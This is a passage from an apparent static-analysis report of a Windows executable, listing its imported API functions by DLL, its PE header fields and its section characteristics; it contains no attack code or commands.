  3675. "name": "GetDiskFreeSpaceA",
  3676. "address": "0x476328"
  3677. },
  3678. {
  3679. "name": "GetDateFormatA",
  3680. "address": "0x47632c"
  3681. },
  3682. {
  3683. "name": "GetCurrentThreadId",
  3684. "address": "0x476330"
  3685. },
  3686. {
  3687. "name": "GetCurrentProcessId",
  3688. "address": "0x476334"
  3689. },
  3690. {
  3691. "name": "GetCPInfo",
  3692. "address": "0x476338"
  3693. },
  3694. {
  3695. "name": "GetACP",
  3696. "address": "0x47633c"
  3697. },
  3698. {
  3699. "name": "FreeResource",
  3700. "address": "0x476340"
  3701. },
  3702. {
  3703. "name": "InterlockedIncrement",
  3704. "address": "0x476344"
  3705. },
  3706. {
  3707. "name": "InterlockedExchange",
  3708. "address": "0x476348"
  3709. },
  3710. {
  3711. "name": "InterlockedDecrement",
  3712. "address": "0x47634c"
  3713. },
  3714. {
  3715. "name": "FreeLibrary",
  3716. "address": "0x476350"
  3717. },
  3718. {
  3719. "name": "FormatMessageA",
  3720. "address": "0x476354"
  3721. },
  3722. {
  3723. "name": "FindResourceA",
  3724. "address": "0x476358"
  3725. },
  3726. {
  3727. "name": "FindFirstFileA",
  3728. "address": "0x47635c"
  3729. },
  3730. {
  3731. "name": "FindClose",
  3732. "address": "0x476360"
  3733. },
  3734. {
  3735. "name": "FileTimeToLocalFileTime",
  3736. "address": "0x476364"
  3737. },
  3738. {
  3739. "name": "FileTimeToDosDateTime",
  3740. "address": "0x476368"
  3741. },
  3742. {
  3743. "name": "EnumCalendarInfoA",
  3744. "address": "0x47636c"
  3745. },
  3746. {
  3747. "name": "EnterCriticalSection",
  3748. "address": "0x476370"
  3749. },
  3750. {
  3751. "name": "DeleteCriticalSection",
  3752. "address": "0x476374"
  3753. },
  3754. {
  3755. "name": "CreateThread",
  3756. "address": "0x476378"
  3757. },
  3758. {
  3759. "name": "CreateFileA",
  3760. "address": "0x47637c"
  3761. },
  3762. {
  3763. "name": "CreateEventA",
  3764. "address": "0x476380"
  3765. },
  3766. {
  3767. "name": "CompareStringA",
  3768. "address": "0x476384"
  3769. },
  3770. {
  3771. "name": "CloseHandle",
  3772. "address": "0x476388"
  3773. }
  3774. ],
  3775. "dll": "kernel32.dll"
  3776. },
  3777. {
  3778. "imports": [
  3779. {
  3780. "name": "VerQueryValueA",
  3781. "address": "0x476390"
  3782. },
  3783. {
  3784. "name": "GetFileVersionInfoSizeA",
  3785. "address": "0x476394"
  3786. },
  3787. {
  3788. "name": "GetFileVersionInfoA",
  3789. "address": "0x476398"
  3790. }
  3791. ],
  3792. "dll": "version.dll"
  3793. },
  3794. {
  3795. "imports": [
  3796. {
  3797. "name": "UnrealizeObject",
  3798. "address": "0x4763a0"
  3799. },
  3800. {
  3801. "name": "StretchBlt",
  3802. "address": "0x4763a4"
  3803. },
  3804. {
  3805. "name": "SetWindowOrgEx",
  3806. "address": "0x4763a8"
  3807. },
  3808. {
  3809. "name": "SetWinMetaFileBits",
  3810. "address": "0x4763ac"
  3811. },
  3812. {
  3813. "name": "SetViewportOrgEx",
  3814. "address": "0x4763b0"
  3815. },
  3816. {
  3817. "name": "SetTextColor",
  3818. "address": "0x4763b4"
  3819. },
  3820. {
  3821. "name": "SetStretchBltMode",
  3822. "address": "0x4763b8"
  3823. },
  3824. {
  3825. "name": "SetROP2",
  3826. "address": "0x4763bc"
  3827. },
  3828. {
  3829. "name": "SetPixel",
  3830. "address": "0x4763c0"
  3831. },
  3832. {
  3833. "name": "SetMapMode",
  3834. "address": "0x4763c4"
  3835. },
  3836. {
  3837. "name": "SetEnhMetaFileBits",
  3838. "address": "0x4763c8"
  3839. },
  3840. {
  3841. "name": "SetDIBColorTable",
  3842. "address": "0x4763cc"
  3843. },
  3844. {
  3845. "name": "SetBrushOrgEx",
  3846. "address": "0x4763d0"
  3847. },
  3848. {
  3849. "name": "SetBkMode",
  3850. "address": "0x4763d4"
  3851. },
  3852. {
  3853. "name": "SetBkColor",
  3854. "address": "0x4763d8"
  3855. },
  3856. {
  3857. "name": "SelectPalette",
  3858. "address": "0x4763dc"
  3859. },
  3860. {
  3861. "name": "SelectObject",
  3862. "address": "0x4763e0"
  3863. },
  3864. {
  3865. "name": "ScaleWindowExtEx",
  3866. "address": "0x4763e4"
  3867. },
  3868. {
  3869. "name": "SaveDC",
  3870. "address": "0x4763e8"
  3871. },
  3872. {
  3873. "name": "RestoreDC",
  3874. "address": "0x4763ec"
  3875. },
  3876. {
  3877. "name": "RectVisible",
  3878. "address": "0x4763f0"
  3879. },
  3880. {
  3881. "name": "RealizePalette",
  3882. "address": "0x4763f4"
  3883. },
  3884. {
  3885. "name": "PlayEnhMetaFile",
  3886. "address": "0x4763f8"
  3887. },
  3888. {
  3889. "name": "PatBlt",
  3890. "address": "0x4763fc"
  3891. },
  3892. {
  3893. "name": "MoveToEx",
  3894. "address": "0x476400"
  3895. },
  3896. {
  3897. "name": "MaskBlt",
  3898. "address": "0x476404"
  3899. },
  3900. {
  3901. "name": "LineTo",
  3902. "address": "0x476408"
  3903. },
  3904. {
  3905. "name": "LPtoDP",
  3906. "address": "0x47640c"
  3907. },
  3908. {
  3909. "name": "IntersectClipRect",
  3910. "address": "0x476410"
  3911. },
  3912. {
  3913. "name": "GetWindowOrgEx",
  3914. "address": "0x476414"
  3915. },
  3916. {
  3917. "name": "GetWinMetaFileBits",
  3918. "address": "0x476418"
  3919. },
  3920. {
  3921. "name": "GetTextMetricsA",
  3922. "address": "0x47641c"
  3923. },
  3924. {
  3925. "name": "GetTextExtentPoint32A",
  3926. "address": "0x476420"
  3927. },
  3928. {
  3929. "name": "GetSystemPaletteEntries",
  3930. "address": "0x476424"
  3931. },
  3932. {
  3933. "name": "GetStockObject",
  3934. "address": "0x476428"
  3935. },
  3936. {
  3937. "name": "GetPixel",
  3938. "address": "0x47642c"
  3939. },
  3940. {
  3941. "name": "GetPaletteEntries",
  3942. "address": "0x476430"
  3943. },
  3944. {
  3945. "name": "GetObjectA",
  3946. "address": "0x476434"
  3947. },
  3948. {
  3949. "name": "GetEnhMetaFilePaletteEntries",
  3950. "address": "0x476438"
  3951. },
  3952. {
  3953. "name": "GetEnhMetaFileHeader",
  3954. "address": "0x47643c"
  3955. },
  3956. {
  3957. "name": "GetEnhMetaFileDescriptionA",
  3958. "address": "0x476440"
  3959. },
  3960. {
  3961. "name": "GetEnhMetaFileBits",
  3962. "address": "0x476444"
  3963. },
  3964. {
  3965. "name": "GetDeviceCaps",
  3966. "address": "0x476448"
  3967. },
  3968. {
  3969. "name": "GetDIBits",
  3970. "address": "0x47644c"
  3971. },
  3972. {
  3973. "name": "GetDIBColorTable",
  3974. "address": "0x476450"
  3975. },
  3976. {
  3977. "name": "GetDCOrgEx",
  3978. "address": "0x476454"
  3979. },
  3980. {
  3981. "name": "GetCurrentPositionEx",
  3982. "address": "0x476458"
  3983. },
  3984. {
  3985. "name": "GetClipBox",
  3986. "address": "0x47645c"
  3987. },
  3988. {
  3989. "name": "GetBrushOrgEx",
  3990. "address": "0x476460"
  3991. },
  3992. {
  3993. "name": "GetBitmapBits",
  3994. "address": "0x476464"
  3995. },
  3996. {
  3997. "name": "ExcludeClipRect",
  3998. "address": "0x476468"
  3999. },
  4000. {
  4001. "name": "EndPage",
  4002. "address": "0x47646c"
  4003. },
  4004. {
  4005. "name": "EndDoc",
  4006. "address": "0x476470"
  4007. },
  4008. {
  4009. "name": "DeleteObject",
  4010. "address": "0x476474"
  4011. },
  4012. {
  4013. "name": "DeleteEnhMetaFile",
  4014. "address": "0x476478"
  4015. },
  4016. {
  4017. "name": "DeleteDC",
  4018. "address": "0x47647c"
  4019. },
  4020. {
  4021. "name": "CreateSolidBrush",
  4022. "address": "0x476480"
  4023. },
  4024. {
  4025. "name": "CreatePenIndirect",
  4026. "address": "0x476484"
  4027. },
  4028. {
  4029. "name": "CreatePalette",
  4030. "address": "0x476488"
  4031. },
  4032. {
  4033. "name": "CreateICA",
  4034. "address": "0x47648c"
  4035. },
  4036. {
  4037. "name": "CreateHalftonePalette",
  4038. "address": "0x476490"
  4039. },
  4040. {
  4041. "name": "CreateFontIndirectA",
  4042. "address": "0x476494"
  4043. },
  4044. {
  4045. "name": "CreateEnhMetaFileA",
  4046. "address": "0x476498"
  4047. },
  4048. {
  4049. "name": "CreateDIBitmap",
  4050. "address": "0x47649c"
  4051. },
  4052. {
  4053. "name": "CreateDIBSection",
  4054. "address": "0x4764a0"
  4055. },
  4056. {
  4057. "name": "CreateDCA",
  4058. "address": "0x4764a4"
  4059. },
  4060. {
  4061. "name": "CreateCompatibleDC",
  4062. "address": "0x4764a8"
  4063. },
  4064. {
  4065. "name": "CreateCompatibleBitmap",
  4066. "address": "0x4764ac"
  4067. },
  4068. {
  4069. "name": "CreateBrushIndirect",
  4070. "address": "0x4764b0"
  4071. },
  4072. {
  4073. "name": "CreateBitmap",
  4074. "address": "0x4764b4"
  4075. },
  4076. {
  4077. "name": "CopyEnhMetaFileA",
  4078. "address": "0x4764b8"
  4079. },
  4080. {
  4081. "name": "CloseEnhMetaFile",
  4082. "address": "0x4764bc"
  4083. },
  4084. {
  4085. "name": "BitBlt",
  4086. "address": "0x4764c0"
  4087. }
  4088. ],
  4089. "dll": "gdi32.dll"
  4090. },
  4091. {
  4092. "imports": [
  4093. {
  4094. "name": "CreateWindowExA",
  4095. "address": "0x4764c8"
  4096. },
  4097. {
  4098. "name": "WindowFromPoint",
  4099. "address": "0x4764cc"
  4100. },
  4101. {
  4102. "name": "WinHelpA",
  4103. "address": "0x4764d0"
  4104. },
  4105. {
  4106. "name": "WaitMessage",
  4107. "address": "0x4764d4"
  4108. },
  4109. {
  4110. "name": "UpdateWindow",
  4111. "address": "0x4764d8"
  4112. },
  4113. {
  4114. "name": "UnregisterClassA",
  4115. "address": "0x4764dc"
  4116. },
  4117. {
  4118. "name": "UnhookWindowsHookEx",
  4119. "address": "0x4764e0"
  4120. },
  4121. {
  4122. "name": "TranslateMessage",
  4123. "address": "0x4764e4"
  4124. },
  4125. {
  4126. "name": "TranslateMDISysAccel",
  4127. "address": "0x4764e8"
  4128. },
  4129. {
  4130. "name": "TrackPopupMenu",
  4131. "address": "0x4764ec"
  4132. },
  4133. {
  4134. "name": "SystemParametersInfoA",
  4135. "address": "0x4764f0"
  4136. },
  4137. {
  4138. "name": "ShowWindow",
  4139. "address": "0x4764f4"
  4140. },
  4141. {
  4142. "name": "ShowScrollBar",
  4143. "address": "0x4764f8"
  4144. },
  4145. {
  4146. "name": "ShowOwnedPopups",
  4147. "address": "0x4764fc"
  4148. },
  4149. {
  4150. "name": "ShowCursor",
  4151. "address": "0x476500"
  4152. },
  4153. {
  4154. "name": "SetWindowsHookExA",
  4155. "address": "0x476504"
  4156. },
  4157. {
  4158. "name": "SetWindowPos",
  4159. "address": "0x476508"
  4160. },
  4161. {
  4162. "name": "SetWindowPlacement",
  4163. "address": "0x47650c"
  4164. },
  4165. {
  4166. "name": "SetWindowLongA",
  4167. "address": "0x476510"
  4168. },
  4169. {
  4170. "name": "SetTimer",
  4171. "address": "0x476514"
  4172. },
  4173. {
  4174. "name": "SetScrollRange",
  4175. "address": "0x476518"
  4176. },
  4177. {
  4178. "name": "SetScrollPos",
  4179. "address": "0x47651c"
  4180. },
  4181. {
  4182. "name": "SetScrollInfo",
  4183. "address": "0x476520"
  4184. },
  4185. {
  4186. "name": "SetRect",
  4187. "address": "0x476524"
  4188. },
  4189. {
  4190. "name": "SetPropA",
  4191. "address": "0x476528"
  4192. },
  4193. {
  4194. "name": "SetParent",
  4195. "address": "0x47652c"
  4196. },
  4197. {
  4198. "name": "SetMenuItemInfoA",
  4199. "address": "0x476530"
  4200. },
  4201. {
  4202. "name": "SetMenu",
  4203. "address": "0x476534"
  4204. },
  4205. {
  4206. "name": "SetForegroundWindow",
  4207. "address": "0x476538"
  4208. },
  4209. {
  4210. "name": "SetFocus",
  4211. "address": "0x47653c"
  4212. },
  4213. {
  4214. "name": "SetCursor",
  4215. "address": "0x476540"
  4216. },
  4217. {
  4218. "name": "SetClassLongA",
  4219. "address": "0x476544"
  4220. },
  4221. {
  4222. "name": "SetCapture",
  4223. "address": "0x476548"
  4224. },
  4225. {
  4226. "name": "SetActiveWindow",
  4227. "address": "0x47654c"
  4228. },
  4229. {
  4230. "name": "SendMessageA",
  4231. "address": "0x476550"
  4232. },
  4233. {
  4234. "name": "ScrollWindow",
  4235. "address": "0x476554"
  4236. },
  4237. {
  4238. "name": "ScreenToClient",
  4239. "address": "0x476558"
  4240. },
  4241. {
  4242. "name": "RemovePropA",
  4243. "address": "0x47655c"
  4244. },
  4245. {
  4246. "name": "RemoveMenu",
  4247. "address": "0x476560"
  4248. },
  4249. {
  4250. "name": "ReleaseDC",
  4251. "address": "0x476564"
  4252. },
  4253. {
  4254. "name": "ReleaseCapture",
  4255. "address": "0x476568"
  4256. },
  4257. {
  4258. "name": "RegisterWindowMessageA",
  4259. "address": "0x47656c"
  4260. },
  4261. {
  4262. "name": "RegisterClipboardFormatA",
  4263. "address": "0x476570"
  4264. },
  4265. {
  4266. "name": "RegisterClassA",
  4267. "address": "0x476574"
  4268. },
  4269. {
  4270. "name": "RedrawWindow",
  4271. "address": "0x476578"
  4272. },
  4273. {
  4274. "name": "PtInRect",
  4275. "address": "0x47657c"
  4276. },
  4277. {
  4278. "name": "PostQuitMessage",
  4279. "address": "0x476580"
  4280. },
  4281. {
  4282. "name": "PostMessageA",
  4283. "address": "0x476584"
  4284. },
  4285. {
  4286. "name": "PeekMessageA",
  4287. "address": "0x476588"
  4288. },
  4289. {
  4290. "name": "OffsetRect",
  4291. "address": "0x47658c"
  4292. },
  4293. {
  4294. "name": "OemToCharA",
  4295. "address": "0x476590"
  4296. },
  4297. {
  4298. "name": "MsgWaitForMultipleObjects",
  4299. "address": "0x476594"
  4300. },
  4301. {
  4302. "name": "MessageBoxA",
  4303. "address": "0x476598"
  4304. },
  4305. {
  4306. "name": "MapWindowPoints",
  4307. "address": "0x47659c"
  4308. },
  4309. {
  4310. "name": "MapVirtualKeyA",
  4311. "address": "0x4765a0"
  4312. },
  4313. {
  4314. "name": "LoadStringA",
  4315. "address": "0x4765a4"
  4316. },
  4317. {
  4318. "name": "LoadKeyboardLayoutA",
  4319. "address": "0x4765a8"
  4320. },
  4321. {
  4322. "name": "LoadIconA",
  4323. "address": "0x4765ac"
  4324. },
  4325. {
  4326. "name": "LoadCursorA",
  4327. "address": "0x4765b0"
  4328. },
  4329. {
  4330. "name": "LoadBitmapA",
  4331. "address": "0x4765b4"
  4332. },
  4333. {
  4334. "name": "KillTimer",
  4335. "address": "0x4765b8"
  4336. },
  4337. {
  4338. "name": "IsZoomed",
  4339. "address": "0x4765bc"
  4340. },
  4341. {
  4342. "name": "IsWindowVisible",
  4343. "address": "0x4765c0"
  4344. },
  4345. {
  4346. "name": "IsWindowEnabled",
  4347. "address": "0x4765c4"
  4348. },
  4349. {
  4350. "name": "IsWindow",
  4351. "address": "0x4765c8"
  4352. },
  4353. {
  4354. "name": "IsRectEmpty",
  4355. "address": "0x4765cc"
  4356. },
  4357. {
  4358. "name": "IsIconic",
  4359. "address": "0x4765d0"
  4360. },
  4361. {
  4362. "name": "IsDialogMessageA",
  4363. "address": "0x4765d4"
  4364. },
  4365. {
  4366. "name": "IsChild",
  4367. "address": "0x4765d8"
  4368. },
  4369. {
  4370. "name": "InvalidateRect",
  4371. "address": "0x4765dc"
  4372. },
  4373. {
  4374. "name": "IntersectRect",
  4375. "address": "0x4765e0"
  4376. },
  4377. {
  4378. "name": "InsertMenuItemA",
  4379. "address": "0x4765e4"
  4380. },
  4381. {
  4382. "name": "InsertMenuA",
  4383. "address": "0x4765e8"
  4384. },
  4385. {
  4386. "name": "InflateRect",
  4387. "address": "0x4765ec"
  4388. },
  4389. {
  4390. "name": "GetWindowThreadProcessId",
  4391. "address": "0x4765f0"
  4392. },
  4393. {
  4394. "name": "GetWindowTextA",
  4395. "address": "0x4765f4"
  4396. },
  4397. {
  4398. "name": "GetWindowRect",
  4399. "address": "0x4765f8"
  4400. },
  4401. {
  4402. "name": "GetWindowPlacement",
  4403. "address": "0x4765fc"
  4404. },
  4405. {
  4406. "name": "GetWindowLongA",
  4407. "address": "0x476600"
  4408. },
  4409. {
  4410. "name": "GetWindowDC",
  4411. "address": "0x476604"
  4412. },
  4413. {
  4414. "name": "GetTopWindow",
  4415. "address": "0x476608"
  4416. },
  4417. {
  4418. "name": "GetSystemMetrics",
  4419. "address": "0x47660c"
  4420. },
  4421. {
  4422. "name": "GetSystemMenu",
  4423. "address": "0x476610"
  4424. },
  4425. {
  4426. "name": "GetSysColorBrush",
  4427. "address": "0x476614"
  4428. },
  4429. {
  4430. "name": "GetSysColor",
  4431. "address": "0x476618"
  4432. },
  4433. {
  4434. "name": "GetSubMenu",
  4435. "address": "0x47661c"
  4436. },
  4437. {
  4438. "name": "GetScrollRange",
  4439. "address": "0x476620"
  4440. },
  4441. {
  4442. "name": "GetScrollPos",
  4443. "address": "0x476624"
  4444. },
  4445. {
  4446. "name": "GetScrollInfo",
  4447. "address": "0x476628"
  4448. },
  4449. {
  4450. "name": "GetPropA",
  4451. "address": "0x47662c"
  4452. },
  4453. {
  4454. "name": "GetParent",
  4455. "address": "0x476630"
  4456. },
  4457. {
  4458. "name": "GetWindow",
  4459. "address": "0x476634"
  4460. },
  4461. {
  4462. "name": "GetMessageTime",
  4463. "address": "0x476638"
  4464. },
  4465. {
  4466. "name": "GetMenuStringA",
  4467. "address": "0x47663c"
  4468. },
  4469. {
  4470. "name": "GetMenuState",
  4471. "address": "0x476640"
  4472. },
  4473. {
  4474. "name": "GetMenuItemInfoA",
  4475. "address": "0x476644"
  4476. },
  4477. {
  4478. "name": "GetMenuItemID",
  4479. "address": "0x476648"
  4480. },
  4481. {
  4482. "name": "GetMenuItemCount",
  4483. "address": "0x47664c"
  4484. },
  4485. {
  4486. "name": "GetMenu",
  4487. "address": "0x476650"
  4488. },
  4489. {
  4490. "name": "GetLastActivePopup",
  4491. "address": "0x476654"
  4492. },
  4493. {
  4494. "name": "GetKeyboardState",
  4495. "address": "0x476658"
  4496. },
  4497. {
  4498. "name": "GetKeyboardLayoutList",
  4499. "address": "0x47665c"
  4500. },
  4501. {
  4502. "name": "GetKeyboardLayout",
  4503. "address": "0x476660"
  4504. },
  4505. {
  4506. "name": "GetKeyState",
  4507. "address": "0x476664"
  4508. },
  4509. {
  4510. "name": "GetKeyNameTextA",
  4511. "address": "0x476668"
  4512. },
  4513. {
  4514. "name": "GetIconInfo",
  4515. "address": "0x47666c"
  4516. },
  4517. {
  4518. "name": "GetForegroundWindow",
  4519. "address": "0x476670"
  4520. },
  4521. {
  4522. "name": "GetFocus",
  4523. "address": "0x476674"
  4524. },
  4525. {
  4526. "name": "GetDesktopWindow",
  4527. "address": "0x476678"
  4528. },
  4529. {
  4530. "name": "GetDCEx",
  4531. "address": "0x47667c"
  4532. },
  4533. {
  4534. "name": "GetDC",
  4535. "address": "0x476680"
  4536. },
  4537. {
  4538. "name": "GetCursorPos",
  4539. "address": "0x476684"
  4540. },
  4541. {
  4542. "name": "GetCursor",
  4543. "address": "0x476688"
  4544. },
  4545. {
  4546. "name": "GetClipboardData",
  4547. "address": "0x47668c"
  4548. },
  4549. {
  4550. "name": "GetClientRect",
  4551. "address": "0x476690"
  4552. },
  4553. {
  4554. "name": "GetClassNameA",
  4555. "address": "0x476694"
  4556. },
  4557. {
  4558. "name": "GetClassInfoA",
  4559. "address": "0x476698"
  4560. },
  4561. {
  4562. "name": "GetCapture",
  4563. "address": "0x47669c"
  4564. },
  4565. {
  4566. "name": "GetActiveWindow",
  4567. "address": "0x4766a0"
  4568. },
  4569. {
  4570. "name": "FrameRect",
  4571. "address": "0x4766a4"
  4572. },
  4573. {
  4574. "name": "FindWindowA",
  4575. "address": "0x4766a8"
  4576. },
  4577. {
  4578. "name": "FillRect",
  4579. "address": "0x4766ac"
  4580. },
  4581. {
  4582. "name": "EqualRect",
  4583. "address": "0x4766b0"
  4584. },
  4585. {
  4586. "name": "EnumWindows",
  4587. "address": "0x4766b4"
  4588. },
  4589. {
  4590. "name": "EnumThreadWindows",
  4591. "address": "0x4766b8"
  4592. },
  4593. {
  4594. "name": "EndPaint",
  4595. "address": "0x4766bc"
  4596. },
  4597. {
  4598. "name": "EnableWindow",
  4599. "address": "0x4766c0"
  4600. },
  4601. {
  4602. "name": "EnableScrollBar",
  4603. "address": "0x4766c4"
  4604. },
  4605. {
  4606. "name": "EnableMenuItem",
  4607. "address": "0x4766c8"
  4608. },
  4609. {
  4610. "name": "DrawTextA",
  4611. "address": "0x4766cc"
  4612. },
  4613. {
  4614. "name": "DrawMenuBar",
  4615. "address": "0x4766d0"
  4616. },
  4617. {
  4618. "name": "DrawIconEx",
  4619. "address": "0x4766d4"
  4620. },
  4621. {
  4622. "name": "DrawIcon",
  4623. "address": "0x4766d8"
  4624. },
  4625. {
  4626. "name": "DrawFrameControl",
  4627. "address": "0x4766dc"
  4628. },
  4629. {
  4630. "name": "DrawEdge",
  4631. "address": "0x4766e0"
  4632. },
  4633. {
  4634. "name": "DispatchMessageA",
  4635. "address": "0x4766e4"
  4636. },
  4637. {
  4638. "name": "DestroyWindow",
  4639. "address": "0x4766e8"
  4640. },
  4641. {
  4642. "name": "DestroyMenu",
  4643. "address": "0x4766ec"
  4644. },
  4645. {
  4646. "name": "DestroyIcon",
  4647. "address": "0x4766f0"
  4648. },
  4649. {
  4650. "name": "DestroyCursor",
  4651. "address": "0x4766f4"
  4652. },
  4653. {
  4654. "name": "DeleteMenu",
  4655. "address": "0x4766f8"
  4656. },
  4657. {
  4658. "name": "DefWindowProcA",
  4659. "address": "0x4766fc"
  4660. },
  4661. {
  4662. "name": "DefMDIChildProcA",
  4663. "address": "0x476700"
  4664. },
  4665. {
  4666. "name": "DefFrameProcA",
  4667. "address": "0x476704"
  4668. },
  4669. {
  4670. "name": "CreatePopupMenu",
  4671. "address": "0x476708"
  4672. },
  4673. {
  4674. "name": "CreateMenu",
  4675. "address": "0x47670c"
  4676. },
  4677. {
  4678. "name": "CreateIcon",
  4679. "address": "0x476710"
  4680. },
  4681. {
  4682. "name": "ClientToScreen",
  4683. "address": "0x476714"
  4684. },
  4685. {
  4686. "name": "CheckMenuItem",
  4687. "address": "0x476718"
  4688. },
  4689. {
  4690. "name": "CallWindowProcA",
  4691. "address": "0x47671c"
  4692. },
  4693. {
  4694. "name": "CallNextHookEx",
  4695. "address": "0x476720"
  4696. },
  4697. {
  4698. "name": "BeginPaint",
  4699. "address": "0x476724"
  4700. },
  4701. {
  4702. "name": "CharNextA",
  4703. "address": "0x476728"
  4704. },
  4705. {
  4706. "name": "CharLowerBuffA",
  4707. "address": "0x47672c"
  4708. },
  4709. {
  4710. "name": "CharLowerA",
  4711. "address": "0x476730"
  4712. },
  4713. {
  4714. "name": "CharToOemA",
  4715. "address": "0x476734"
  4716. },
  4717. {
  4718. "name": "AdjustWindowRectEx",
  4719. "address": "0x476738"
  4720. },
  4721. {
  4722. "name": "ActivateKeyboardLayout",
  4723. "address": "0x47673c"
  4724. }
  4725. ],
  4726. "dll": "user32.dll"
  4727. },
  4728. {
  4729. "imports": [
  4730. {
  4731. "name": "Sleep",
  4732. "address": "0x476744"
  4733. }
  4734. ],
  4735. "dll": "kernel32.dll"
  4736. },
  4737. {
  4738. "imports": [
  4739. {
  4740. "name": "SafeArrayPtrOfIndex",
  4741. "address": "0x47674c"
  4742. },
  4743. {
  4744. "name": "SafeArrayGetUBound",
  4745. "address": "0x476750"
  4746. },
  4747. {
  4748. "name": "SafeArrayGetLBound",
  4749. "address": "0x476754"
  4750. },
  4751. {
  4752. "name": "SafeArrayCreate",
  4753. "address": "0x476758"
  4754. },
  4755. {
  4756. "name": "VariantChangeType",
  4757. "address": "0x47675c"
  4758. },
  4759. {
  4760. "name": "VariantCopy",
  4761. "address": "0x476760"
  4762. },
  4763. {
  4764. "name": "VariantClear",
  4765. "address": "0x476764"
  4766. },
  4767. {
  4768. "name": "VariantInit",
  4769. "address": "0x476768"
  4770. }
  4771. ],
  4772. "dll": "oleaut32.dll"
  4773. },
  4774. {
  4775. "imports": [
  4776. {
  4777. "name": "CreateStreamOnHGlobal",
  4778. "address": "0x476770"
  4779. },
  4780. {
  4781. "name": "IsAccelerator",
  4782. "address": "0x476774"
  4783. },
  4784. {
  4785. "name": "OleDraw",
  4786. "address": "0x476778"
  4787. },
  4788. {
  4789. "name": "OleSetMenuDescriptor",
  4790. "address": "0x47677c"
  4791. },
  4792. {
  4793. "name": "CoCreateInstance",
  4794. "address": "0x476780"
  4795. },
  4796. {
  4797. "name": "CoGetClassObject",
  4798. "address": "0x476784"
  4799. },
  4800. {
  4801. "name": "CoUninitialize",
  4802. "address": "0x476788"
  4803. },
  4804. {
  4805. "name": "CoInitialize",
  4806. "address": "0x47678c"
  4807. },
  4808. {
  4809. "name": "IsEqualGUID",
  4810. "address": "0x476790"
  4811. }
  4812. ],
  4813. "dll": "ole32.dll"
  4814. },
  4815. {
  4816. "imports": [
  4817. {
  4818. "name": "GetErrorInfo",
  4819. "address": "0x476798"
  4820. },
  4821. {
  4822. "name": "SysFreeString",
  4823. "address": "0x47679c"
  4824. }
  4825. ],
  4826. "dll": "oleaut32.dll"
  4827. },
  4828. {
  4829. "imports": [
  4830. {
  4831. "name": "ImageList_SetIconSize",
  4832. "address": "0x4767a4"
  4833. },
  4834. {
  4835. "name": "ImageList_GetIconSize",
  4836. "address": "0x4767a8"
  4837. },
  4838. {
  4839. "name": "ImageList_Write",
  4840. "address": "0x4767ac"
  4841. },
  4842. {
  4843. "name": "ImageList_Read",
  4844. "address": "0x4767b0"
  4845. },
  4846. {
  4847. "name": "ImageList_GetDragImage",
  4848. "address": "0x4767b4"
  4849. },
  4850. {
  4851. "name": "ImageList_DragShowNolock",
  4852. "address": "0x4767b8"
  4853. },
  4854. {
  4855. "name": "ImageList_SetDragCursorImage",
  4856. "address": "0x4767bc"
  4857. },
  4858. {
  4859. "name": "ImageList_DragMove",
  4860. "address": "0x4767c0"
  4861. },
  4862. {
  4863. "name": "ImageList_DragLeave",
  4864. "address": "0x4767c4"
  4865. },
  4866. {
  4867. "name": "ImageList_DragEnter",
  4868. "address": "0x4767c8"
  4869. },
  4870. {
  4871. "name": "ImageList_EndDrag",
  4872. "address": "0x4767cc"
  4873. },
  4874. {
  4875. "name": "ImageList_BeginDrag",
  4876. "address": "0x4767d0"
  4877. },
  4878. {
  4879. "name": "ImageList_Remove",
  4880. "address": "0x4767d4"
  4881. },
  4882. {
  4883. "name": "ImageList_DrawEx",
  4884. "address": "0x4767d8"
  4885. },
  4886. {
  4887. "name": "ImageList_Draw",
  4888. "address": "0x4767dc"
  4889. },
  4890. {
  4891. "name": "ImageList_GetBkColor",
  4892. "address": "0x4767e0"
  4893. },
  4894. {
  4895. "name": "ImageList_SetBkColor",
  4896. "address": "0x4767e4"
  4897. },
  4898. {
  4899. "name": "ImageList_ReplaceIcon",
  4900. "address": "0x4767e8"
  4901. },
  4902. {
  4903. "name": "ImageList_Add",
  4904. "address": "0x4767ec"
  4905. },
  4906. {
  4907. "name": "ImageList_GetImageCount",
  4908. "address": "0x4767f0"
  4909. },
  4910. {
  4911. "name": "ImageList_Destroy",
  4912. "address": "0x4767f4"
  4913. },
  4914. {
  4915. "name": "ImageList_Create",
  4916. "address": "0x4767f8"
  4917. }
  4918. ],
  4919. "dll": "comctl32.dll"
  4920. },
  4921. {
  4922. "imports": [
  4923. {
  4924. "name": "OpenPrinterA",
  4925. "address": "0x476800"
  4926. },
  4927. {
  4928. "name": "EnumPrintersA",
  4929. "address": "0x476804"
  4930. },
  4931. {
  4932. "name": "DocumentPropertiesA",
  4933. "address": "0x476808"
  4934. },
  4935. {
  4936. "name": "ClosePrinter",
  4937. "address": "0x47680c"
  4938. }
  4939. ],
  4940. "dll": "winspool.drv"
  4941. },
  4942. {
  4943. "imports": [
  4944. {
  4945. "name": "PrintDlgA",
  4946. "address": "0x476814"
  4947. }
  4948. ],
  4949. "dll": "comdlg32.dll"
  4950. }
  4951. ],
  4952. "digital_signers": null,
  4953. "exported_dll_name": null,
  4954. "actual_checksum": "0x000c8491",
  4955. "overlay": null,
  4956. "imagebase": "0x00400000",
  4957. "reported_checksum": "0x00000000",
  4958. "icon_hash": null,
  4959. "entrypoint": "0x0046a7a0",
  4960. "timestamp": "1992-01-19 17:30:04",
  4961. "osversion": "4.0",
  4962. "sections": [
  4963. {
  4964. "name": "CODE",
  4965. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
  4966. "virtual_address": "0x00001000",
  4967. "size_of_data": "0x00069800",
  4968. "entropy": "6.53",
  4969. "raw_address": "0x00000400",
  4970. "virtual_size": "0x000697e8",
  4971. "characteristics_raw": "0x60000020"
  4972. },
  4973. {
  4974. "name": "DATA",
  4975. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  4976. "virtual_address": "0x0006b000",
  4977. "size_of_data": "0x00009e00",
  4978. "entropy": "5.04",
  4979. "raw_address": "0x00069c00",
  4980. "virtual_size": "0x00009ca8",
  4981. "characteristics_raw": "0xc0000040"
  4982. },
  4983. {
  4984. "name": "BSS",
  4985. "characteristics": "IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  4986. "virtual_address": "0x00075000",
  4987. "size_of_data": "0x00000000",
  4988. "entropy": "0.00",
  4989. "raw_address": "0x00073a00",
  4990. "virtual_size": "0x00000fa9",
